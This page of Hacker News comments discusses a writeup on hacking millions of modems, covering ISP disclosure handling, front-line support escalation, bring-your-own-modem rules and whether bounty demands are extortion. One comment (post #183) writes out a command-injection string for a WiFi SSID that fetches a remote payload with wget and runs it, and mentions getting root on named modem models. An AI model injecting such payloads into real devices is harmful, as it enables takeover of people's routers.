Live data from Hacker News

Hacking millions of modems and investigating who hacked my modem

samcurry.net

181–190 of 282 posts

Re: Hacking millions of modems and investigating who hacked my modem

#181
post #2

What a great article. Very easy to follow. The best part was that instead of attacking the messenger and denying any problem, Cox seem to have acted like the very model of responsible security response in this kind of situation. I'd love to read a follow up on what the bug was that intermittently permitted unauthorised access to the APIs. It's the kind of error that could easily be missed by superficial testing or de…

> Cox seem to have acted like the very model of responsible security response in this kind of situation It's hard to imagine, but I wish they would have taken advantage of him walking in with the compromised device in the first place. I once stumbled upon a really bad vulnerability in a traditional telco provider, and the amount of work it took to get them to pay attention when only having the front door available wa…

> the amount of work it took to get them to pay attention when only having the front door available was staggering.

I've seen this across most companies I've tried reporting stuff to, two examples.

Sniffies (NSFW - gay hookup site) was at one point blasting their internal models out over a websocket, this included IP, private photos, salt + password [not plaintext], reports (who reported you, their message, etc), internal data such as your ISP and push notification certs for sending browser notifications. First line support dismissed it. Emails to higher ups got it taken care of in Funimation back in ~2019(?) was using Demandware for their shop, and left the API for it basically wide open, allowing you to query orders (with no info required) getting Last 4 of CC, address, email, etc for every order. Again frontline support dismissed it. This one took messaging the CTO over linkedin to get it resolved < a week (thanksgiving week at that).

Re: Hacking millions of modems and investigating who hacked my modem

#182
post #146

Earlier quoted context omitted.

> Cox's support organization was presented with a compromised device being handed to them by an infosec professional, and they couldn't handle it effectively at all. He probably should have gone the responsible disclosure route with the modem too. Do you really expect a minimum wage front desk worker to be able to determine what’s a potential major security flaw, and what’s a random idiot who thinks his modem is brok…

> He probably should have gone the responsible disclosure route with the modem too I think he was probably keen to get back on the Internet to be fair.

He wasn’t off the internet. He just determined his modem was hacked. Given it had been hacked for who knows how long, what’s one more day? They responded to his api submission in 6 hours.

Re: Hacking millions of modems and investigating who hacked my modem

#183
post #118
post #117

Earlier quoted context omitted.

Is changing the WiFi SSID not executing a command on the device? It isn't _arbitrary_ commands (yet), but it's definitely executing _a_ command.

That's not the kind of vulnerability that would have installed an exploit on their CPE.

Maybe, maybe not.

If the CPE is sufficiently poorly designed, it might be vulnerable to command injection attacks, so by changing the WiFi SSID to something like "'; wget http://bla/payload -O /tmp/bla; chmod +x /tmp/bla; /tmp/bla; #" you could execute a command on the device.

Alcatel's HH40V and HH41V as well as ZTE MF283+ LTE modems are a recent example I can remember where I got root SSH access by injecting commands from the admin WebUI.

Re: Hacking millions of modems and investigating who hacked my modem

#184

What sucks about this situation is when your ISP forces you to use their modem or router. For example, I have AT&T fiber and it does some kind of 802.1X authentication with certificates to connect to their network. If they didn't do this, I could just plug any arbitrary device into the ONT. There are/were workarounds to this but I don't want to go through all those hoops to get online. Instead, I ended up disabling e…

That's why I'm not an AT&T customer. Spectrum lets me bring my own hardware, and they're the only other option in my area, so Spectrum gets my business. Plain and simple. Unfortunately, not everyone has the palatable solution that I have.

Re: Hacking millions of modems and investigating who hacked my modem

#185

Earlier quoted context omitted.

I would expect a front-desk worker to be trained to escalate issues within the org, and supported in doing so.

Have you ever worked as a front-line support agent? I'm guessing not. I have many years ago, and for an ISP too. If I bought an Amazon share back then for every time a customer called support because they were "hacked", I'd not be posting here during a boring meeting because I'd own my own private island. The two best conversations I can recall were when we changed a customer's email address about a half dozen times…

> The author's mistake was not posting somewhere like NANOG or Full-Disclosure with a detailed write-up.

This is an organizational equivalent of a code smell. Something is off when support people aren't writing up the anomalies and escalating them.

Some of the most serious security issues I've ever had to deal with started with either a sales rep getting a call or a very humble ticket with a level one escalating it up. Problem is for every serious security issue that gets written up, forty-two or so end up getting ignored because the support agent is evaluated on tickets per hour or some other metric that incentivizes ignoring anything that can't be closed by sending a knowledge base article.

Re: Hacking millions of modems and investigating who hacked my modem

#186

Earlier quoted context omitted.

I would expect a front-desk worker to be trained to escalate issues within the org, and supported in doing so.

Have you ever worked as a front-line support agent? I'm guessing not. I have many years ago, and for an ISP too. If I bought an Amazon share back then for every time a customer called support because they were "hacked", I'd not be posting here during a boring meeting because I'd own my own private island. The two best conversations I can recall were when we changed a customer's email address about a half dozen times…

You can tell exactly from the responses in this thread who has dealt with the general public in a support role, and who hasn't.

Re: Hacking millions of modems and investigating who hacked my modem

#187

Earlier quoted context omitted.

Ethics and character, yes, and an attitude towards life that doesn't regard money as the deeper meaning of everything.

Ethics aside, what is characterful about saying no to money? Should I say no to my salary for character reasons?

There's a difference between doing your job and earning money as a result vs. finding keys to someone's house and selling said keys to the highest bidder.

Re: Hacking millions of modems and investigating who hacked my modem

#189

Earlier quoted context omitted.

> it's only fair for them to financially award people that responsibly inform them of vulnerabilities instead of easily and anonymously selling those. Yes, Cox has that choice . But, what you're describing is the definition of extortion. The fact that it's easy for people to get away with it does not make it ethical.

It's not the definition of extortion. If I walk past a business and notice the locks on their windows are rusted and I happen to be a lock guy and say hey, I noticed your locks are fucked, I'd be happy to consult for you and show you how and why they are broken, that's just doing business. Extortion is telling them, hey, your locks are fucked and I'm telling everyone unless you pay me. It requires a threat.

You just manufactured a completely different scenario.

The comment I responded to was this:

>it's only fair for them to financially award people that responsibly inform them of vulnerabilities instead of easily and anonymously selling those.

That comment includes the threat ("instead of easily and anonymously selling those").

So, yes. That is the definition of extortion.

Re: Hacking millions of modems and investigating who hacked my modem

#190
post #81

i'm really glad that i can use my own modem. In germany every ISP is by law required to accept self brought modems. They can't force you to use their often shitty hardware. My current modem/router is up for 3 months without a single interruption to my connection.

I've noticed it gets quite murky when dealing with fibre-to-the-premises, particularly in the UK. Although I don't think an ISP would disallow BYOD, I imagine they'd just not be as likely to support it. I recently moved ISP, partly because of cost, but also because they offered a great home router as part of their bundle. The installer could not utilise any of the existing wiring in my house, had to be all drilled a…

With Aussie NBN most providers use pppoe or dhcp, which allows byod or ISP router.
Post reply on HN